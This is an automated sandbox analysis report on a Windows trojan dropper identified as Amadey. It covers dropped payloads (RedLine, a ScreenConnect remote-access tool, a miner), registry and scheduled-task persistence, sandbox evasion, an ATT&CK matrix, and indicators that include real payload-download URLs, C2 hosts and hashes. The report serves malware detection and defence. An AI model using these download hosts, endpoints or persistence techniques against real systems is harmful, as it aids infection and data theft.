                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeCode function: 0_2_005F132A GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_005F132A
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeCode function: 0_2_005E48B0 GetUserNameA,0_2_005E48B0
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeCode function: 0_2_005E98AE GetModuleHandleA,GetVersion,Sleep,std::_Throw_Cpp_error,0_2_005E98AE
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                            Stealing of Sensitive Information

                            Source: Yara matchFile source: 10.2.HM3SOlbpH71yEXUIEAOeIiGX.exe.6c770000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.HM3SOlbpH71yEXUIEAOeIiGX.exe.6c79b000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.HM3SOlbpH71yEXUIEAOeIiGX.exe.6c79b000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000C.00000002.1840252168.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.1823708292.000000006C79B000.00000004.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 4092, type: MEMORYSTR
                            Source: Yara matchFile source: 10.2.HM3SOlbpH71yEXUIEAOeIiGX.exe.6c770000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.HM3SOlbpH71yEXUIEAOeIiGX.exe.6c79b000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.HM3SOlbpH71yEXUIEAOeIiGX.exe.6c79b000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000A.00000002.1823708292.000000006C79B000.00000004.00000001.01000000.0000000D.sdmp, type: MEMORY

                            Remote Access Functionality

                            Source: Yara matchFile source: 10.2.HM3SOlbpH71yEXUIEAOeIiGX.exe.6c770000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.HM3SOlbpH71yEXUIEAOeIiGX.exe.6c79b000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.HM3SOlbpH71yEXUIEAOeIiGX.exe.6c79b000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000C.00000002.1840252168.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.1823708292.000000006C79B000.00000004.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 4092, type: MEMORYSTR
                            Source: Yara matchFile source: 10.2.HM3SOlbpH71yEXUIEAOeIiGX.exe.6c770000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.HM3SOlbpH71yEXUIEAOeIiGX.exe.6c79b000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.HM3SOlbpH71yEXUIEAOeIiGX.exe.6c79b000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000A.00000002.1823708292.000000006C79B000.00000004.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 8.0.FRaqbC8wSA1XvpFVjCRGryWt.exe.fbb9d4.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 8.0.FRaqbC8wSA1XvpFVjCRGryWt.exe.f363d4.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 8.0.FRaqbC8wSA1XvpFVjCRGryWt.exe.fe518c.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 8.0.FRaqbC8wSA1XvpFVjCRGryWt.exe.f20000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000008.00000000.1765448808.0000000000F36000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: FRaqbC8wSA1XvpFVjCRGryWt.exe PID: 6680, type: MEMORYSTR
                            Source: Yara matchFile source: C:\ProgramData\hQdOgl4rhYQYx3G5aYY61LEd.exe, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\V6uPDVniSnRMWuLn5U9T3TGJ.exe, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\b1s7nlT2NqFJ3sl3xbYiMCIq.exe, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\yt3cew8k69RKLpgTFur2iz2M.exe, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\2TUSzbAUfKRfcjcMzfoV1qdi.exe, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\6KZmcK8r6beUzmRf6Ci6nx8d.exe, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\SmLAztxc1o8yfogkJXrRjbDt.exe, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\3HvoFOAmEaJswFCHOzyfyz5b.exe, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\yDd3OJXsNQptgFrYILoygXLs.exe, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\xpTljBOh8s4KWiGtXsL1c00g.exe, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\oZolmRBaYFkuutSgcOrBLSAQ.exe, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\ixjnzi95HfqR77bieLYCT4aJ.exe, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\6pkNzPZrIkyPzGNsokLQ8aZR.exe, type: DROPPED
                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity InformationAcquire InfrastructureValid Accounts131
                            Windows Management Instrumentation
                            1
                            DLL Side-Loading
                            1
                            DLL Side-Loading
                            1
                            Disable or Modify Tools
                            11
                            Input Capture
                            1
                            System Time Discovery
                            Remote Services11
                            Archive Collected Data
                            1
                            Ingress Tool Transfer
                            Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault Accounts1
                            Native API
                            1
                            Scheduled Task/Job
                            512
                            Process Injection
                            11
                            Deobfuscate/Decode Files or Information
                            LSASS Memory1
                            Account Discovery
                            Remote Desktop Protocol11
                            Input Capture
                            1
                            Encrypted Channel
                            Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain Accounts1
                            Scheduled Task/Job
                            21
                            Registry Run Keys / Startup Folder
                            1
                            Scheduled Task/Job
                            3
                            Obfuscated Files or Information
                            Security Account Manager1
                            File and Directory Discovery
                            SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                            Registry Run Keys / Startup Folder
                            11
                            Software Packing
                            NTDS145
                            System Information Discovery
                            Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                            DLL Side-Loading
                            LSA Secrets1
                            Query Registry
                            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                            Masquerading
                            Cached Domain Credentials461
                            Security Software Discovery
                            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                            Modify Registry
                            DCSync2
                            Process Discovery
                            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job261
                            Virtualization/Sandbox Evasion
                            Proc Filesystem261
                            Virtualization/Sandbox Evasion
                            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt512
                            Process Injection
                            /etc/passwd and /etc/shadow1
                            Application Window Discovery
                            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                            Hidden Users
                            Network Sniffing1
                            System Owner/User Discovery
                            Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                            Behavior Graph ID: 1479881  Sample: RPHbzz3JqY.exe  Startdate: 24/07/2024  Architecture: WINDOWS  Score: 100

                            Start (node 2)
                            • Signatures: Sigma detected: Xmrig; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 12 other signatures
                            • Started: explert.exe (9), RPHbzz3JqY.exe (14), Cerker.exe (16), 8 other processes (18)

                            explert.exe (9)
                            • DNS/IP: 185.196.10.57 SIMPLECARRIERCH Switzerland; 185.216.214.218 SERVERDISCOUNTERserverdiscountercomDE Germany; 188.114.96.3 CLOUDFLARENETUS European Union
                            • Dropped: C:\ProgramData\yt3cew8k69RKLpgTFur2iz2M.exe, PE32; 17 other malicious files
                            • Signatures: Creates an undocumented autostart registry key
                            • Started: IIZS2TRqf69aZbLAX3cf3edn.exe (20), HM3SOlbpH71yEXUIEAOeIiGX.exe (24), FRaqbC8wSA1XvpFVjCRGryWt.exe (26), 14 other processes (32)

                            RPHbzz3JqY.exe (14)
                            • Dropped: C:\Users\user\AppData\Local\...\explert.exe, PE32; C:\Users\user\...\explert.exe:Zone.Identifier, ASCII
                            • Signatures: Creates multiple autostart registry keys; Contains functionality to inject code into remote processes; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Uses schtasks.exe or at.exe to add and modify task schedules
                            • Started: explert.exe (28), schtasks.exe (30)

                            Cerker.exe (16)
                            • Dropped: C:\Users\user\AppData\...\sys_updater.exe, PE32

                            8 other processes (18)
                            • Dropped: C:\Users\user\AppData\...\sys_updater.exe, PE32; C:\Users\user\AppData\...\sys_updater.exe, PE32+; C:\Users\user\AppData\...\sys_updater.exe, PE32; 3 other malicious files
                            • Signatures: Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

                            IIZS2TRqf69aZbLAX3cf3edn.exe (20)
                            • Dropped: C:\Users\user\AppData\...\sys_updater.exe, PE32+; C:\Users\user\AppData\Local\Temp\gtxkvh.exe, PE32
                            • Signatures: Multi AV Scanner detection for dropped file; Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines); Writes to foreign memory regions; 2 other signatures
                            • Started: gtxkvh.exe (34), AddInProcess.exe (38), AddInProcess.exe (41)

                            HM3SOlbpH71yEXUIEAOeIiGX.exe (24)
                            • Dropped: C:\Users\user\AppData\Roaming\d3d9.dll, PE32
                            • Signatures: Antivirus detection for dropped file; Machine Learning detection for dropped file; Allocates memory in foreign processes
                            • Started: MSBuild.exe (43), conhost.exe (45)

                            FRaqbC8wSA1XvpFVjCRGryWt.exe (26)
                            • Signatures: Contains functionality to hide user accounts

                            schtasks.exe (30)
                            • Started: conhost.exe (47)

                            14 other processes (32)
                            • Started: conhost.exe (49)

                            gtxkvh.exe (34)
                            • Dropped: C:\Users\user\AppData\...\sys_updater.exe, PE32; C:\Users\user\AppData\Local\...\Cerker.exe, PE32
                            • Signatures: Creates an undocumented autostart registry key; Creates multiple autostart registry keys
                            • Started: Cerker.exe (51), schtasks.exe (56)

                            AddInProcess.exe (38)
                            • DNS/IP: 212.47.253.124 OnlineSASFR France
                            • Signatures: Query firmware table information (likely to detect VMs)

                            AddInProcess.exe (41)
                            • DNS/IP: 146.59.154.106 OVHFR Norway

                            MSBuild.exe (43)
                            • Signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

                            Cerker.exe (51)
                            • DNS/IP: 188.114.97.3 CLOUDFLARENETUS European Union
                            • Dropped: C:\Users\user\AppData\...\sys_updater.exe, PE32
                            • Signatures: Creates an undocumented autostart registry key

                            schtasks.exe (56)
                            • Started: conhost.exe (58)

Source | Detection | Scanner | Label | Link
RPHbzz3JqY.exe | 61% | ReversingLabs | Win32.Trojan.Amadey |
RPHbzz3JqY.exe | 57% | Virustotal | | Browse
RPHbzz3JqY.exe | 100% | Avira | HEUR/AGEN.1319014 |
RPHbzz3JqY.exe | 100% | Joe Sandbox ML | |
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | 100% | Avira | HEUR/AGEN.1319014 |
C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe | 100% | Avira | HEUR/AGEN.1310947 |
C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | 100% | Joe Sandbox ML | |
C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe | 100% | Joe Sandbox ML | |
C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe | 83% | ReversingLabs | ByteCode-MSIL.Ransomware.RedLine |
C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe | 76% | Virustotal | | Browse
C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | 83% | ReversingLabs | Win64.Trojan.Casdet |
C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | 74% | Virustotal | | Browse
No Antivirus matches
                            No contacted domains info
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                                                                          https://feedback.screenconnect.com/Feedback.axdFRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.0000000000F36000.00000002.00000001.01000000.00000008.sdmpfalse
                                                                                                                                                                            http://www.fontbureau.com/designers8MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              https://api.msn.com/IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2172293908.00000234D5AAE000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2165069693.00000234D5BB1000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2670749256.0000021E03431000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2655069424.0000021E03431000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2772816830.00000159F3891000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2750695258.00000159F3560000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2945215932.0000020E497F1000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2895586429.0000020E49481000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                http://185.196.10.57/explert.exe, 00000004.00000003.1848114752.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1829302373.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1797286786.00000000013DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  https://solutionhub.cc/sys_updater.exe, 00000018.00000003.2658110747.0000021E0344A000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2684596327.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F358D000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F35A6000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2954321429.0000020E49515000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2916180807.0000020E494AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    http://185.216.214.218/Population.exeUexplert.exe, 00000004.00000003.1829302373.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1797286786.00000000013DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      https://solutionhub.cc/socket/?id=5A9B846E0A19DD545B8CA4BF94E01DCEB8D04EDC07764AA4329CDB473E7FBAA3&usys_updater.exe, 0000001F.00000003.2916180807.0000020E494AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        https://solutionhub.cc/2;sys_updater.exe, 0000001F.00000003.2954321429.0000020E49515000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2916180807.0000020E494AE000.00000004.00000020.00020000.00000000.sdmpfalse
IP | Domain | Country | ASN | ASN Name | Malicious
185.196.10.57 | unknown | Switzerland | 42624 | SIMPLECARRIERCH | false
212.47.253.124 | unknown | France | 12876 | OnlineSASFR | false
188.114.97.3 | unknown | European Union | 13335 | CLOUDFLARENETUS | false
188.114.96.3 | unknown | European Union | 13335 | CLOUDFLARENETUS | false
146.59.154.106 | unknown | Norway | 16276 | OVHFR | false
185.216.214.218 | unknown | Germany | 205388 | SERVERDISCOUNTERserverdiscountercomDE | false
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1479881
Start date and time:2024-07-24 09:25:33 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 15m 8s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:45
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:RPHbzz3JqY.exe
renamed because original name is a hash value
Original Sample Name:848abdbd09c052799a0e0180b59f6fee.exe
Detection:MAL
Classification:mal100.troj.evad.mine.winEXE@69/36@0/6
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 43
• Number of non-executed functions: 146
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Skipping network analysis since the amount of network traffic is too extensive
Time | Type | Description
03:26:26 | API Interceptor | 103676x Sleep call for process: explert.exe modified
03:27:23 | API Interceptor | 57898x Sleep call for process: IIZS2TRqf69aZbLAX3cf3edn.exe modified
03:29:23 | API Interceptor | 95x Sleep call for process: Cerker.exe modified
08:26:24 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce explert.exe C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
08:26:25 | Task Scheduler | Run new task: explert.exe path: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
08:26:32 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce explert.exe C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
08:27:16 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysUpdateSvc C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe
08:27:24 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run BackgroundUpdater C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe
08:27:32 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysUpdateSvc C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe
08:27:40 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run BackgroundUpdater C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe
08:28:40 | Task Scheduler | Run new task: Cerker.exe path: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
08:28:44 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Cerker.exe C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
08:28:52 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Cerker.exe C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
                                                                                                                                                                                          No context
                                                                                                                                                                                          No context
                                                                                                                                                                                          No context
                                                                                                                                                                                          No context
                                                                                                                                                                                          No context
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):5649720
                                                                                                                                                                                          Entropy (8bit):7.437063088535606
                                                                                                                                                                                          Encrypted:false
SSDEEP: 98304:C9s6efPGi9gOTXohA4sJNtxutjIeGq7tq5O8TjoIi88Q:YfefPGi9gOTXsstxwMsvz
MD5: E9DD0FC8F690BC7CBE71A51CF6C79F31
SHA1: C3B5ADC55749AA4C60FD94FB75831966C012BEAA
SHA-256: D2DAD56F10F5700FF7435A73010CCD4EBC2B6740EC4D5033E44EC382384C442C
SHA-512: 8A001F5343A90E13A84398F8339D15FAECBD1F209B631A9FDD4E67A5FCB170DACB25466E43CFDF35AF7F6545ECD71127DE3AF2E7BEAC7E08E6FF1661E513B741
Malicious: true
Yara Hits:
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\2TUSzbAUfKRfcjcMzfoV1qdi.exe, Author: Joe Security
Reputation: unknown
Process: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 5649720
Entropy (8bit): 7.437063088535606
Encrypted: false
SSDEEP: 98304:C9s6efPGi9gOTXohA4sJNtxutjIeGq7tq5O8TjoIi88Q:YfefPGi9gOTXsstxwMsvz
MD5: E9DD0FC8F690BC7CBE71A51CF6C79F31
SHA1: C3B5ADC55749AA4C60FD94FB75831966C012BEAA
SHA-256: D2DAD56F10F5700FF7435A73010CCD4EBC2B6740EC4D5033E44EC382384C442C
SHA-512: 8A001F5343A90E13A84398F8339D15FAECBD1F209B631A9FDD4E67A5FCB170DACB25466E43CFDF35AF7F6545ECD71127DE3AF2E7BEAC7E08E6FF1661E513B741
Malicious: true
Yara Hits:
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\3HvoFOAmEaJswFCHOzyfyz5b.exe, Author: Joe Security
Reputation: unknown
Process: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 5649720
Entropy (8bit): 7.437063088535606
Encrypted: false
SSDEEP: 98304:C9s6efPGi9gOTXohA4sJNtxutjIeGq7tq5O8TjoIi88Q:YfefPGi9gOTXsstxwMsvz
MD5: E9DD0FC8F690BC7CBE71A51CF6C79F31
SHA1: C3B5ADC55749AA4C60FD94FB75831966C012BEAA
SHA-256: D2DAD56F10F5700FF7435A73010CCD4EBC2B6740EC4D5033E44EC382384C442C
SHA-512: 8A001F5343A90E13A84398F8339D15FAECBD1F209B631A9FDD4E67A5FCB170DACB25466E43CFDF35AF7F6545ECD71127DE3AF2E7BEAC7E08E6FF1661E513B741
Malicious: true
Yara Hits:
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\6KZmcK8r6beUzmRf6Ci6nx8d.exe, Author: Joe Security
Reputation: unknown
Process: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 5649720
Entropy (8bit): 7.437063088535606
Encrypted: false
SSDEEP: 98304:C9s6efPGi9gOTXohA4sJNtxutjIeGq7tq5O8TjoIi88Q:YfefPGi9gOTXsstxwMsvz
MD5: E9DD0FC8F690BC7CBE71A51CF6C79F31
SHA1: C3B5ADC55749AA4C60FD94FB75831966C012BEAA
SHA-256: D2DAD56F10F5700FF7435A73010CCD4EBC2B6740EC4D5033E44EC382384C442C
SHA-512: 8A001F5343A90E13A84398F8339D15FAECBD1F209B631A9FDD4E67A5FCB170DACB25466E43CFDF35AF7F6545ECD71127DE3AF2E7BEAC7E08E6FF1661E513B741
Malicious: true
Yara Hits:
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\6pkNzPZrIkyPzGNsokLQ8aZR.exe, Author: Joe Security
Reputation: unknown
Process: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 5649720
Entropy (8bit): 7.437063088535606
Encrypted: false
SSDEEP: 98304:C9s6efPGi9gOTXohA4sJNtxutjIeGq7tq5O8TjoIi88Q:YfefPGi9gOTXsstxwMsvz
MD5: E9DD0FC8F690BC7CBE71A51CF6C79F31
SHA1: C3B5ADC55749AA4C60FD94FB75831966C012BEAA
SHA-256: D2DAD56F10F5700FF7435A73010CCD4EBC2B6740EC4D5033E44EC382384C442C
SHA-512: 8A001F5343A90E13A84398F8339D15FAECBD1F209B631A9FDD4E67A5FCB170DACB25466E43CFDF35AF7F6545ECD71127DE3AF2E7BEAC7E08E6FF1661E513B741
Malicious: true
Yara Hits:
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe, Author: Joe Security
Reputation: unknown
Process: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
File Type: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 697856
Entropy (8bit): 6.928945768865187
Encrypted: false
SSDEEP: 12288:Llq9SNKjqNUt5LRfyUgpBvBV9aPp2exoxNxFhWuR4OM8AfCZghsWT9FLUI/D/vqO:Ll+SNKeslybnBOexBO
MD5: 4F5771AA008FB55801A3F9FBA7130F69
SHA1: EAACE725791C08810198C08907B84B8850D4EF5B
SHA-256: 447ED0BDF4F8D0479545724B9578D2A3296B6BC5E2162D7BA405276234ECCF0D
SHA-512: 0CE8C4C44338D92F4A5F07F38A93812A85CE5524A4ED0C4E4D616127EA6FE02E94DF0938075B4D2DC3EEAD2FAC4A827230B0D2E1333BB51146D92417B1A5BFEC
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 83%
• Antivirus: Virustotal, Detection: 76%
Reputation: unknown
Process: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1180160
Entropy (8bit): 7.703603560955088
Encrypted: false
